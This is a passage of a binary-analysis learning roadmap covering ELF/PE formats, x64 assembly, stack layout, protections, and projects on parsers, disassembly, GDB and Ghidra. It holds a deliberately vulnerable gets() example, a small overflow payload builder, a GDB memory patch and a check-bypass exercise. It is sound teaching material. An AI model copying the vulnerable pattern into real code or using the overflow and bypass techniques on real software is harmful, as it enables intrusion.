Learn Binary Analysis: From Zero to Reverse Engineering Master

Goal: Deeply understand binary analysis—from file formats and assembly to disassembly, debugging, exploitation, malware analysis, and building your own reverse engineering tools.


Why Learn Binary Analysis?

Binary analysis is the art of understanding compiled programs without source code. It’s the foundation of:

  • Security Research: Finding vulnerabilities in closed-source software
  • Malware Analysis: Understanding what malicious software does
  • CTF Competitions: Binary exploitation (pwn) challenges
  • Game Hacking/Modding: Reverse engineering game mechanics
  • Software Archaeology: Understanding legacy systems
  • Compiler Development: Seeing how high-level code becomes machine code

After completing these projects, you will:

  • Read and understand x86/x64 assembly fluently
  • Analyze any binary file format (ELF, PE, Mach-O)
  • Use professional tools (Ghidra, IDA, radare2, GDB)
  • Exploit buffer overflows and build ROP chains
  • Analyze malware safely and effectively
  • Build your own disassembler and analysis tools

Core Concept Analysis

The Binary Analysis Landscape

┌─────────────────────────────────────────────────────────────────────────┐
│                        SOURCE CODE (if available)                        │
│                                                                          │
│   int main() {                                                          │
│       char buf[64];                                                     │
│       gets(buf);        // Vulnerable!                                  │
│       return 0;                                                         │
│   }                                                                      │
└─────────────────────────────────────────────────────────────────────────┘
                                 │
                                 ▼ Compilation
┌─────────────────────────────────────────────────────────────────────────┐
│                        BINARY EXECUTABLE                                 │
│                                                                          │
│   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00   .ELF............   │
│   03 00 3e 00 01 00 00 00 40 10 00 00 00 00 00 00   ..>.....@.......   │
│   ...                                                                    │
└─────────────────────────────────────────────────────────────────────────┘
                                 │
          ┌──────────────────────┼──────────────────────┐
          ▼                      ▼                      ▼
┌──────────────────┐  ┌──────────────────┐  ┌──────────────────┐
│ STATIC ANALYSIS  │  │ DYNAMIC ANALYSIS │  │   EXPLOITATION   │
│                  │  │                  │  │                  │
│ • Disassembly    │  │ • Debugging      │  │ • Buffer Overflow│
│ • Decompilation  │  │ • Tracing        │  │ • ROP Chains     │
│ • CFG Analysis   │  │ • Instrumentation│  │ • Shellcode      │
│ • String Search  │  │ • Emulation      │  │ • Format Strings │
└──────────────────┘  └──────────────────┘  └──────────────────┘

Key Concepts Explained

1. Binary File Formats

ELF (Executable and Linkable Format) - Linux/Unix

┌──────────────────────────────────────────┐
│     ELF Header (64 bytes for ELF64)      │
│  • Magic: 0x7F 'E' 'L' 'F'               │
│  • Class: 32-bit or 64-bit               │
│  • Entry point address                    │
│  • Program header offset                  │
│  • Section header offset                  │
├──────────────────────────────────────────┤
│         Program Header Table             │
│  (Segments - runtime view)               │
│  • PT_LOAD: Loadable segments            │
│  • PT_DYNAMIC: Dynamic linking info      │
│  • PT_INTERP: Interpreter path           │
├──────────────────────────────────────────┤
│              Sections                     │
│  .text    - Executable code              │
│  .data    - Initialized data             │
│  .bss     - Uninitialized data           │
│  .rodata  - Read-only data (strings)     │
│  .plt     - Procedure Linkage Table      │
│  .got     - Global Offset Table          │
│  .symtab  - Symbol table                 │
│  .strtab  - String table                 │
├──────────────────────────────────────────┤
│         Section Header Table             │
│  (Sections - linking view)               │
└──────────────────────────────────────────┘
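
The header fields in the diagram can be decoded with a few lines of Python. This is a minimal sketch, not a full parser: it assumes the standard field order of the ELF header (e_ident, then e_type, e_machine, e_version, e_entry, e_phoff, e_shoff), and the function name `parse_elf_header` and the trailing offsets in the sample are made up for illustration.

```python
import struct

def parse_elf_header(data: bytes) -> dict:
    """Decode e_ident plus a few fixed header fields of an ELF image."""
    if data[:4] != b"\x7fELF":
        raise ValueError("missing ELF magic")
    is_64 = data[4] == 2                    # EI_CLASS: 1 = ELF32, 2 = ELF64
    endian = "<" if data[5] == 1 else ">"   # EI_DATA: 1 = little, 2 = big
    # Fields after e_ident[16]: e_type, e_machine, e_version,
    # e_entry, e_phoff, e_shoff (address-sized fields differ by class).
    layout = "HHIQQQ" if is_64 else "HHIIII"
    e_type, e_machine, _version, e_entry, e_phoff, e_shoff = struct.unpack_from(
        endian + layout, data, 16
    )
    return {
        "bits": 64 if is_64 else 32,
        "type": e_type,
        "machine": e_machine,
        "entry": e_entry,
        "phoff": e_phoff,
        "shoff": e_shoff,
    }

# The first 32 bytes are the hex dump from the landscape diagram; the two
# offsets appended after them (e_phoff = 0x40, e_shoff = 0) are invented
# for this demo.
sample = bytes.fromhex(
    "7f454c46020101000000000000000000"
    "03003e00010000004010000000000000"
) + struct.pack("<QQ", 0x40, 0)

header = parse_elf_header(sample)
print(header["bits"], hex(header["machine"]), hex(header["entry"]))
# prints: 64 0x3e 0x1040
```

Reading EI_CLASS and EI_DATA first matters because every later field depends on them: the class decides whether addresses are 4 or 8 bytes, and the data encoding decides the byte order.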

PE (Portable Executable) - Windows

┌──────────────────────────────────────────┐
│           DOS Header                      │
│  • Magic: 'MZ' (0x5A4D)                  │
│  • e_lfanew: Offset to PE header         │
├──────────────────────────────────────────┤
│           DOS Stub                        │
│  "This program cannot be run in DOS mode"│
├──────────────────────────────────────────┤
│           PE Signature: "PE\0\0"         │
├──────────────────────────────────────────┤
│           COFF File Header               │
│  • Machine type (x86, x64, ARM)          │
│  • Number of sections                     │
│  • Timestamp                             │
├──────────────────────────────────────────┤
│        Optional Header (PE32/PE32+)      │
│  • Entry point (AddressOfEntryPoint)     │
│  • ImageBase (preferred load address)    │
│  • Data directories (imports, exports)   │
├──────────────────────────────────────────┤
│           Section Headers                 │
│  .text   - Code                          │
│  .data   - Initialized data              │
│  .rdata  - Read-only data, imports       │
│  .rsrc   - Resources (icons, dialogs)    │
└──────────────────────────────────────────┘

2. x86/x64 Assembly Fundamentals

Registers (x64)

General Purpose (64-bit):
┌─────────────────────────────────────────────────────────────┐
│ RAX (accumulator)      │ Return values, arithmetic          │
│ RBX (base)             │ Callee-saved, general purpose      │
│ RCX (counter)          │ Arg 4, loop counter                │
│ RDX (data)             │ Arg 3, I/O, multiplication         │
│ RSI (source index)     │ Arg 2, string source               │
│ RDI (destination)      │ Arg 1, string destination          │
│ RBP (base pointer)     │ Stack frame base (callee-saved)    │
│ RSP (stack pointer)    │ Current stack top                  │
│ R8-R15                 │ Additional registers (R8-R9 args)  │
└─────────────────────────────────────────────────────────────┘

Special Registers:
┌─────────────────────────────────────────────────────────────┐
│ RIP (instruction ptr)  │ Address of next instruction        │
│ RFLAGS                 │ Status flags (ZF, CF, SF, OF)      │
└─────────────────────────────────────────────────────────────┘

Register Sizes:
┌─────────────────────────────────────────────────────────────┐
│ 64-bit │ 32-bit │ 16-bit │ 8-bit high │ 8-bit low │
│  RAX   │  EAX   │   AX   │     AH     │    AL     │
│  RBX   │  EBX   │   BX   │     BH     │    BL     │
│  RCX   │  ECX   │   CX   │     CH     │    CL     │
│  RDX   │  EDX   │   DX   │     DH     │    DL     │
└─────────────────────────────────────────────────────────────┘

Calling Conventions

Linux x64 (System V AMD64 ABI):
  Arguments: RDI, RSI, RDX, RCX, R8, R9 (then stack)
  Return:    RAX (and RDX for 128-bit)
  Caller-saved: RAX, RCX, RDX, RSI, RDI, R8-R11
  Callee-saved: RBX, RBP, R12-R15

Windows x64:
  Arguments: RCX, RDX, R8, R9 (then stack, with shadow space)
  Return:    RAX
  Caller-saved: RAX, RCX, RDX, R8-R11
  Callee-saved: RBX, RBP, RDI, RSI, R12-R15

Common Instructions

; Data Movement
mov  rax, rbx       ; rax = rbx
lea  rax, [rbx+8]   ; rax = rbx + 8 (computes the address; no memory access)
push rax            ; Push rax onto stack
pop  rax            ; Pop top of stack into rax

; Arithmetic
add  rax, rbx       ; rax = rax + rbx
sub  rax, rbx       ; rax = rax - rbx
imul rax, rbx       ; rax = rax * rbx (signed)
xor  rax, rax       ; rax = 0 (clear register, common idiom)

; Comparison & Jumps
cmp  rax, rbx       ; Compare (sets flags)
test rax, rax       ; AND without storing (sets ZF if rax == 0)
jmp  label          ; Unconditional jump
je   label          ; Jump if equal (ZF=1)
jne  label          ; Jump if not equal (ZF=0)
jl   label          ; Jump if less (signed)
jg   label          ; Jump if greater (signed)

; Function Calls
call func           ; Push return address, jump to func
ret                 ; Pop return address, jump to it

; System Calls (Linux x64)
syscall             ; Invoke kernel (syscall number in RAX)

3. Stack Layout (x64)

High addresses
┌──────────────────────────────────────────┐
│           Previous Stack Frame           │
├──────────────────────────────────────────┤
│              Return Address              │  ← Pushed by CALL
├──────────────────────────────────────────┤
│              Saved RBP                   │  ← Pushed by function prologue
├──────────────────────────────────────────┤  ← RBP points here
│              Local Variable 1            │
├──────────────────────────────────────────┤
│              Local Variable 2            │
├──────────────────────────────────────────┤
│              Buffer (e.g., char[64])     │
├──────────────────────────────────────────┤  ← RSP points here
│              (Stack grows down)          │
└──────────────────────────────────────────┘
Low addresses

Function Prologue:
    push rbp          ; Save old base pointer
    mov  rbp, rsp     ; Set new base pointer
    sub  rsp, N       ; Allocate N bytes for locals

Function Epilogue:
    mov  rsp, rbp     ; Restore stack pointer
    pop  rbp          ; Restore old base pointer
    ret               ; Return to caller

4. Buffer Overflow Basics

Normal execution:
┌─────────────┐
│ Return Addr │ → points to caller
├─────────────┤
│ Saved RBP   │
├─────────────┤
│ Buffer[64]  │ ← User input goes here
└─────────────┘

After overflow:
┌─────────────┐
│ AAAA...AAAA │ ← Overwritten return address!
├─────────────┤     Now points to attacker code
│ AAAA...AAAA │ ← Overwritten saved RBP
├─────────────┤
│ AAAAAAAAAA  │ ← Original buffer, filled with 'A's
│ AAAAAAAAAA  │
│ AAAAAAAAAA  │
└─────────────┘
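
The overflow diagram translates directly into a byte layout. The sketch below assumes the simplest possible frame: the 64-byte buffer sits immediately below the saved RBP, with no padding and no stack canary. Real compilers often insert padding, so the distance must be measured rather than assumed. The target address 0x401337 is a placeholder and `build_payload` is an illustrative name.

```python
import struct

BUF_SIZE = 64        # char buf[64] from the example source
SAVED_RBP_SIZE = 8   # saved frame pointer on x86-64

def build_payload(target_addr: int) -> bytes:
    """Fill the buffer, overwrite saved RBP, then overwrite the return address."""
    filler = b"A" * BUF_SIZE
    fake_rbp = b"B" * SAVED_RBP_SIZE
    ret = struct.pack("<Q", target_addr)   # 8-byte little-endian address
    return filler + fake_rbp + ret

payload = build_payload(0x401337)
print(len(payload), payload[-8:].hex())
# prints: 80 3713400000000000
```

The address is packed little-endian because x86-64 stores the least significant byte at the lowest address, which is why the bytes appear reversed in the hex output.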

5. Static vs Dynamic Analysis

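┌─────────────────────────────────────────────────────────────────┐
│ Aspect    │ Static Analysis          │ Dynamic Analysis         │
├─────────────────────────────────────────────────────────────────┤
│ Execution │ No execution             │ Runs the binary          │
│ Tools     │ Disassembler, Decompiler │ Debugger, Tracer         │
│ Pros      │ Safe, complete coverage  │ See actual behavior      │
│ Cons      │ Can’t see runtime values │ May miss code paths      │
│ Examples  │ Ghidra, IDA, radare2     │ GDB, strace, ltrace      │
└─────────────────────────────────────────────────────────────────┘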
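
String search is the simplest static technique, and a rough equivalent of the `strings` utility fits in a few lines. This is a sketch under the assumption that only printable ASCII runs matter; `extract_strings` and the sample blob are illustrative.

```python
import re

def extract_strings(data: bytes, min_len: int = 4) -> list:
    """Return runs of at least min_len printable ASCII bytes found in data."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]

blob = b"\x00\x01Enter password: \x00\xffAccess Denied!\x00ab\x00"
for s in extract_strings(blob):
    print(repr(s))
```

Nothing is executed here, which is what makes the technique safe on untrusted samples. The cost is that strings built or decrypted at run time never show up.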

6. Modern Protections

┌─────────────────────────────────────────────────────────────┐
│ Protection           │ What it does                         │
├─────────────────────────────────────────────────────────────┤
│ ASLR                 │ Randomize memory layout              │
│ Stack Canary         │ Detect stack buffer overflows        │
│ NX/DEP               │ Non-executable stack/heap            │
│ PIE                  │ Position-independent executable      │
│ RELRO                │ Read-only GOT after relocation       │
│ CFI                  │ Control-flow integrity               │
└─────────────────────────────────────────────────────────────┘

Check protections with checksec:
$ checksec --file=./binary
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

Project List

The following 18 projects will teach you binary analysis from fundamentals to advanced techniques.


Project 1: ELF File Parser

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: C
  • Alternative Programming Languages: Python, Rust, Go
  • Coolness Level: Level 3: Genuinely Clever
  • Business Potential: 1. The “Resume Gold”
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Binary Formats / File Parsing
  • Software or Tool: ELF binaries, hex editor
  • Main Book: “Practical Binary Analysis” by Dennis Andriesse

What you’ll build: A command-line tool that parses ELF files and displays all headers, sections, segments, symbols, and relocations in a human-readable format—like a simplified readelf.

Why it teaches binary analysis: Every reverse engineering task starts with understanding the file format. Building a parser forces you to understand every byte of the ELF structure.

Core challenges you’ll face:

  • Parsing the ELF header → maps to understanding magic bytes, class (32/64-bit), endianness
  • Reading program headers → maps to segments, what gets loaded into memory
  • Reading section headers → maps to sections, symbols, strings
  • Handling different architectures → maps to x86, ARM, MIPS variations

Resources for key challenges:

  • Linux Audit - ELF Binaries - Excellent overview
  • “Practical Binary Analysis” Chapter 2 - Comprehensive ELF explanation
  • man 5 elf - Manual page documenting the ELF structures and constants

Key Concepts:

  • ELF Header Structure: “Practical Binary Analysis” Ch. 2 - Andriesse
  • Program vs Section Headers: elf(5) man page
  • Symbol Tables: “Learning ELF” - Can Ozkan (Medium)

  • Difficulty: Intermediate
  • Time estimate: 1-2 weeks
  • Prerequisites: C programming, understanding of pointers and structs, familiarity with hexadecimal

Real world outcome:

$ ./elf_parser /bin/ls
ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
  Class:   ELF64
  Data:    2's complement, little endian
  Version: 1 (current)
  OS/ABI:  UNIX - System V
  Type:    DYN (Shared object file)
  Machine: AMD x86-64
  Entry:   0x6b10

Program Headers:
  Type           Offset   VirtAddr         FileSiz  MemSiz   Flg
  PHDR           0x000040 0x0000000000000040 0x0002d8 0x0002d8 R
  INTERP         0x000318 0x0000000000000318 0x00001c 0x00001c R
  LOAD           0x000000 0x0000000000000000 0x003510 0x003510 R
  ...

Sections:
  [Nr] Name              Type       Address          Size
  [ 0]                   NULL       0x0000000000000000 0x0
  [ 1] .interp           PROGBITS   0x0000000000000318 0x1c
  [ 2] .note.gnu.build-id NOTE      0x0000000000000338 0x24
  ...

Symbols:
  Num:    Value          Size Type    Bind   Name
    1: 0000000000000000     0 FUNC    GLOBAL printf@GLIBC_2.2.5
    2: 0000000000006b10   123 FUNC    GLOBAL _start
  ...

Implementation Hints:

Start by mapping the ELF header structure:

// Don't write code, but understand this structure:
// Elf64_Ehdr contains:
//   e_ident[16]  - Magic number and other info
//   e_type       - Object file type (ET_EXEC, ET_DYN, etc.)
//   e_machine    - Architecture (EM_X86_64, EM_ARM, etc.)
//   e_entry      - Entry point virtual address
//   e_phoff      - Program header table file offset
//   e_shoff      - Section header table file offset
//   e_phnum      - Number of program headers
//   e_shnum      - Number of section headers
//   e_shstrndx   - Index of the section that holds section names

Questions to guide your implementation:

  1. How do you detect if a file is 32-bit or 64-bit ELF?
  2. How do you find the string table section to get section names?
  3. What’s the difference between .dynsym and .symtab?
  4. How do program headers map sections to memory segments?
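
For question 2, the key fact is that a section header stores its name as an offset (sh_name) into the section-name string table, and the header field e_shstrndx says which section that table is. Once the table bytes are loaded, a lookup is just a NUL-terminated read. The helper name `read_cstr` and the sample table are illustrative.

```python
def read_cstr(table: bytes, offset: int) -> str:
    """Read the NUL-terminated string that starts at offset in a string table."""
    end = table.index(b"\x00", offset)
    return table[offset:end].decode("ascii", errors="replace")

# A tiny hand-built string table: offset 0 is always the empty name.
shstrtab = b"\x00.text\x00.data\x00.shstrtab\x00"

for sh_name in (1, 7, 13):
    print(sh_name, read_cstr(shstrtab, sh_name))
```

The same helper works for .strtab and .dynstr, since symbol names are stored the same way (st_name is an offset into the associated string table).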

Learning milestones:

  1. Parse ELF header correctly → Understand file identification
  2. Iterate program headers → Understand runtime memory layout
  3. Iterate section headers → Understand linking and symbols
  4. Resolve symbol names → Understand string tables

Project 2: PE File Parser

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: C
  • Alternative Programming Languages: Python, Rust
  • Coolness Level: Level 3: Genuinely Clever
  • Business Potential: 1. The “Resume Gold”
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Binary Formats / Windows Executables
  • Software or Tool: PE files, Windows or Wine
  • Main Book: “Practical Malware Analysis” by Sikorski & Honig

What you’ll build: A PE file parser that extracts headers, sections, imports, exports, and resources from Windows executables.

Why it teaches binary analysis: Windows malware analysis requires understanding the PE format, and a large share of real-world malware samples are Windows binaries.

Core challenges you’ll face:

  • DOS header and stub → maps to legacy compatibility
  • COFF and Optional headers → maps to PE32 vs PE32+
  • Import Address Table (IAT) → maps to dynamic linking, API calls
  • Export directory → maps to DLL functions

Key Concepts:

  • PE Structure: “Practical Malware Analysis” Ch. 1
  • Import Table: PE Format specification
  • Resources: CFF Explorer documentation

  • Difficulty: Intermediate
  • Time estimate: 1-2 weeks
  • Prerequisites: Project 1 (ELF Parser), understanding of Windows APIs

Real world outcome:

$ ./pe_parser suspicious.exe
DOS Header:
  Magic: MZ (0x5a4d)
  PE Offset: 0x100

PE Header:
  Signature: PE (0x4550)
  Machine: x64 (0x8664)
  Sections: 5
  Timestamp: 2024-01-15 14:32:01

Optional Header:
  Magic: PE32+ (0x20b)
  Entry Point: 0x12a0 (RVA; VA 0x1400012a0)
  Image Base: 0x140000000

Sections:
  Name     VirtAddr   VirtSize   RawSize    Flags
  .text    0x1000     0x5a00     0x5c00     CODE,EXECUTE,READ
  .rdata   0x7000     0x1e00     0x2000     READ
  .data    0x9000     0x400      0x200      READ,WRITE

Imports:
  KERNEL32.dll:
    - CreateFileA
    - ReadFile
    - WriteFile
    - VirtualAlloc    ← Suspicious!
  WS2_32.dll:
    - socket          ← Network activity!
    - connect
    - send
    - recv

Implementation Hints:

The PE format has a layered structure. Parse it step by step:

  1. Read DOS header at offset 0
  2. Follow e_lfanew to find PE signature
  3. Parse COFF header immediately after signature
  4. Parse Optional Header (size varies by PE32 vs PE32+)
  5. Parse section headers after Optional Header
  6. Use Data Directories to find imports, exports, resources
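
Steps 1 through 4 can be sketched as follows. The offsets used (e_lfanew at 0x3C, a 20-byte COFF header, Optional Header magic 0x10B or 0x20B) come from the PE format; the function name `parse_pe_headers` and the synthetic image are assumptions made for the demo, and the sketch stops before the section table and data directories.

```python
import struct

def parse_pe_headers(data: bytes) -> dict:
    """DOS header -> PE signature -> COFF header -> Optional Header magic."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ magic")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)   # offset of "PE\0\0"
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                   # 20-byte COFF header
    machine, n_sections, timestamp = struct.unpack_from("<HHI", data, coff)
    (opt_size,) = struct.unpack_from("<H", data, coff + 16)
    (opt_magic,) = struct.unpack_from("<H", data, coff + 20)
    return {
        "machine": machine,
        "sections": n_sections,
        "timestamp": timestamp,
        "optional_header_size": opt_size,
        "format": {0x10B: "PE32", 0x20B: "PE32+"}.get(opt_magic, "unknown"),
        "section_table_offset": coff + 20 + opt_size,
    }

# Synthetic image built only to exercise the parser (not a loadable file).
image = bytearray(0x11A)
image[0:2] = b"MZ"
struct.pack_into("<I", image, 0x3C, 0x100)            # e_lfanew
image[0x100:0x104] = b"PE\x00\x00"
struct.pack_into("<HHI", image, 0x104, 0x8664, 5, 0)  # machine, sections, time
struct.pack_into("<H", image, 0x114, 0xF0)            # SizeOfOptionalHeader
struct.pack_into("<H", image, 0x118, 0x20B)           # PE32+ magic

info = parse_pe_headers(bytes(image))
print(info["format"], hex(info["machine"]), info["sections"])
# prints: PE32+ 0x8664 5
```

Computing the section table offset from SizeOfOptionalHeader, rather than from a fixed struct size, is what lets the same code handle both PE32 and PE32+.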

Key questions:

  • What does IMAGE_DIRECTORY_ENTRY_IMPORT point to?
  • How are imported function names resolved (hint: thunks)?
  • What’s the difference between RVA and file offset?
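
On the last question: an RVA is an offset from the image base once the file is mapped in memory, while a file offset is a position in the file on disk. Converting between them means finding the section that contains the RVA. In the sketch below, the virtual addresses and sizes mirror the sample output above, but the raw file pointers (0x400, 0x6000, 0x8000) are invented, and `Section` and `rva_to_offset` are illustrative names.

```python
from typing import NamedTuple

class Section(NamedTuple):
    name: str
    virtual_address: int   # RVA where the section is mapped
    virtual_size: int      # size in memory
    raw_pointer: int       # file offset of the section data (assumed values)
    raw_size: int          # size on disk

def rva_to_offset(rva: int, sections: list) -> int:
    """Translate an RVA to a file offset using the section table."""
    for s in sections:
        delta = rva - s.virtual_address
        if 0 <= delta < s.virtual_size:
            if delta >= s.raw_size:
                raise ValueError("RVA is in memory-only (zero-filled) data")
            return s.raw_pointer + delta
    raise ValueError("RVA is not inside any section")

sections = [
    Section(".text", 0x1000, 0x5A00, 0x400, 0x5C00),
    Section(".rdata", 0x7000, 0x1E00, 0x6000, 0x2000),
    Section(".data", 0x9000, 0x400, 0x8000, 0x200),
]

print(hex(rva_to_offset(0x12A0, sections)))
# prints: 0x6a0
```

Every pointer stored in the data directories is an RVA, so a parser that reads imports or exports from the file on disk needs this translation for each one.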

Learning milestones:

  1. Parse headers correctly → Understand PE structure
  2. Extract imports → See what APIs the program uses
  3. Extract exports → Understand DLLs
  4. Handle both PE32 and PE32+ → Support all Windows binaries

Project 3: Build a Simple Disassembler

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: C
  • Alternative Programming Languages: Python (with Capstone), Rust
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 1. The “Resume Gold”
  • Difficulty: Level 3: Advanced
  • Knowledge Area: Disassembly / x86 Instruction Encoding
  • Software or Tool: Intel manuals, Capstone engine
  • Main Book: “Intel 64 and IA-32 Architectures Software Developer’s Manual”

What you’ll build: A disassembler that converts x86/x64 machine code into human-readable assembly instructions.

Why it teaches binary analysis: Understanding how machine code maps to assembly is fundamental. Building a disassembler forces you to understand instruction encoding.

Core challenges you’ll face:

  • Variable-length instructions → maps to x86 has 1-15 byte instructions
  • Prefixes and REX bytes → maps to operand size, 64-bit registers
  • ModR/M and SIB bytes → maps to addressing modes
  • Immediate and displacement → maps to constants and offsets

Key Concepts:

  • x86 Instruction Format: Intel SDM Volume 2, Chapter 2
  • ModR/M Encoding: X86 Opcode Reference
  • Linear vs Recursive Descent: “Practical Binary Analysis” Ch. 6

  • Difficulty: Advanced
  • Time estimate: 2-4 weeks
  • Prerequisites: Projects 1-2, solid x86 assembly knowledge

Real world outcome:

$ ./disasm program.bin
00000000: 55                    push rbp
00000001: 48 89 e5              mov rbp, rsp
00000004: 48 83 ec 40           sub rsp, 0x40
00000008: 48 8d 45 c0           lea rax, [rbp-0x40]
0000000c: 48 89 c7              mov rdi, rax
0000000f: e8 xx xx xx xx        call 0x????????
00000014: 31 c0                 xor eax, eax
00000016: c9                    leave
00000017: c3                    ret

Implementation Hints:

x86 instruction format:

[Prefixes] [REX] [Opcode] [ModR/M] [SIB] [Displacement] [Immediate]
   0-4       0-1    1-3      0-1     0-1      0-4           0-8

Start simple:

  1. Handle single-byte opcodes first (push, pop, ret, nop)
  2. Add instructions with ModR/M byte (mov, add, sub)
  3. Add REX prefix support for 64-bit
  4. Add SIB byte for complex addressing
  5. Handle prefixes (operand size, segment override)

Questions to consider:

  • How do you distinguish mov eax, ebx from mov eax, [ebx]?
  • What does the REX.W bit do?
  • How do you handle instructions with the same opcode but different meanings?
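
The first two questions come down to bit fields. A REX prefix is any byte from 0x40 to 0x4F in 64-bit mode, and a ModR/M byte splits into mod (2 bits), reg (3 bits), and rm (3 bits). The sketch below decodes both and applies them to the bytes `48 89 e5` from the sample output. It only handles opcode 0x89 with register operands and ignores the REX.R and REX.B register extensions; the helper names are illustrative.

```python
REG64 = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"]

def decode_rex(byte: int):
    """Return the W/R/X/B bits of a REX prefix, or None if byte is not REX."""
    if byte & 0xF0 != 0x40:
        return None
    return {"W": (byte >> 3) & 1, "R": (byte >> 2) & 1,
            "X": (byte >> 1) & 1, "B": byte & 1}

def decode_modrm(byte: int):
    """Split a ModR/M byte into (mod, reg, rm)."""
    return (byte >> 6) & 3, (byte >> 3) & 7, byte & 7

def describe_mov_89(modrm: int) -> str:
    """Describe opcode 0x89 (MOV r/m64, r64), assuming REX.W=1, REX.R=REX.B=0."""
    mod, reg, rm = decode_modrm(modrm)
    if mod == 3:                       # mod == 11b: rm names a register
        return "mov %s, %s" % (REG64[rm], REG64[reg])
    return "mov [memory operand], %s" % REG64[reg]

print(decode_rex(0x48))        # W=1 selects 64-bit operand size
print(decode_modrm(0xE5))      # (3, 4, 5)
print(describe_mov_89(0xE5))   # mov rbp, rsp
```

The mod field is what separates `mov eax, ebx` from `mov eax, [ebx]`: the value 3 means the rm field names a register, while 0, 1, and 2 mean a memory operand with no, 8-bit, or 32-bit displacement (with special cases for rm values 4 and 5).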

Learning milestones:

  1. Disassemble basic instructions → Single-byte opcodes work
  2. Handle ModR/M byte → Register and memory operands
  3. Support 64-bit mode → REX prefix parsing
  4. Handle all addressing modes → SIB byte, displacements

Project 4: GDB Debugging Deep Dive

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: C (for targets), GDB commands
  • Alternative Programming Languages: Python (GDB scripting)
  • Coolness Level: Level 3: Genuinely Clever
  • Business Potential: 1. The “Resume Gold”
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Debugging / Dynamic Analysis
  • Software or Tool: GDB, pwndbg/GEF, GCC
  • Main Book: “The Art of Debugging with GDB” by Matloff & Salzman

What you’ll build: A series of increasingly complex debugging exercises, culminating in a GDB Python extension for automated analysis.

Why it teaches binary analysis: Debugging is the most direct way to understand program behavior. GDB is the standard open-source debugger on Linux, and it can be scripted in Python.

Core challenges you’ll face:

  • Setting breakpoints → maps to controlling execution
  • Examining memory → maps to understanding data layout
  • Stepping through code → maps to following control flow
  • Scripting with Python → maps to automating analysis

Key Concepts:

  • Breakpoints and Watchpoints: GDB documentation
  • Memory Examination: “The Art of Debugging” Ch. 3
  • Python GDB API: GDB Python documentation

  • Difficulty: Intermediate
  • Time estimate: 1-2 weeks
  • Prerequisites: Basic C, assembly basics

Real world outcome:

$ gdb ./target_binary
(gdb) break main
(gdb) run
(gdb) disassemble
(gdb) info registers
(gdb) x/20x $rsp           # Examine stack
(gdb) x/s 0x402000         # Examine string
(gdb) set $rax = 0x1337    # Modify register
(gdb) python
>gdb.execute("info registers")
>frame = gdb.selected_frame()
>print(frame.read_register("rip"))
>end
(gdb) continue

Implementation Hints:

Essential GDB commands to master:

# Execution control
run [args]           # Start program
continue (c)         # Continue execution
stepi (si)           # Step one instruction
nexti (ni)           # Step one instruction, stepping over calls
finish               # Run until function returns

# Breakpoints
break *0x401000      # Break at address
break main           # Break at function
watch *0x7ffd1234    # Break on memory write
catch syscall write  # Break on syscall

# Examination
disassemble main     # Show assembly
info registers       # All registers
x/10i $rip           # 10 instructions at RIP
x/20wx $rsp          # 20 words at stack
x/s 0x402000         # String at address
info proc mappings   # Memory layout

# Modification
set $rax = 0         # Change register
set *(int*)0x401000 = 0x90909090  # Patch memory

Create exercises:

  1. Find a hidden password in a crackme
  2. Trace a function’s execution
  3. Modify a return value to bypass a check
  4. Write a GDB script to log all function calls
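
Exercise 4 could start from something like the following. It is a sketch that relies on GDB's Python API (`gdb.Breakpoint` with an overridden `stop` method); the function names in `WATCHED` are placeholders for whatever the target binary actually contains. The `gdb` module only exists inside GDB, so the import is guarded to keep the file importable elsewhere.

```python
try:
    import gdb  # provided by GDB's embedded Python interpreter only
except ImportError:
    gdb = None

WATCHED = ("main", "check_password")  # placeholder function names

def format_call(name: str, pc: int) -> str:
    """Build one log line for a function entry."""
    return "call %s @ 0x%x" % (name, pc)

if gdb is not None:
    class LogCall(gdb.Breakpoint):
        """Breakpoint that logs the hit and lets the program keep running."""

        def stop(self):
            frame = gdb.selected_frame()
            gdb.write(format_call(frame.name() or "?", frame.pc()) + "\n")
            return False  # False tells GDB not to halt at this breakpoint

    for name in WATCHED:
        LogCall(name)
```

Saved as, say, log_calls.py, it would be loaded with `source log_calls.py` at the (gdb) prompt before `run`. Returning False from `stop` is the design choice that turns a breakpoint into a tracer.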

Learning milestones:

  1. Basic debugging → Set breakpoints, step, examine
  2. Memory analysis → Understand stack and heap layout
  3. Modify execution → Change registers and memory
  4. Python scripting → Automate repetitive tasks

Project 5: Ghidra Reverse Engineering

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Java (for scripts), Ghidra
  • Alternative Programming Languages: Python (Ghidrathon)
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 2. The “Micro-SaaS / Pro Tool”
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Static Analysis / Decompilation
  • Software or Tool: Ghidra (NSA), sample binaries
  • Main Book: “Ghidra Software Reverse Engineering for Beginners”

What you’ll build: Complete reverse engineering of several binaries of increasing complexity, including writing Ghidra scripts for automation.

Why it teaches binary analysis: Ghidra is a free, open-source reverse engineering suite that is widely used in industry. Its decompiler produces C-like code from assembly, dramatically speeding up analysis.

Core challenges you’ll face:

  • Navigating Ghidra’s UI → maps to efficient workflow
  • Using the decompiler → maps to understanding control flow
  • Cross-references → maps to finding function usage
  • Writing scripts → maps to automating analysis

Key Concepts:

  • Code Browser: Ghidra documentation
  • Decompiler Window: “Ghidra RE for Beginners” Ch. 4
  • Ghidra Scripting: Ghidra API documentation

  • Difficulty: Intermediate
  • Time estimate: 2-3 weeks
  • Prerequisites: Projects 1-4, solid assembly knowledge

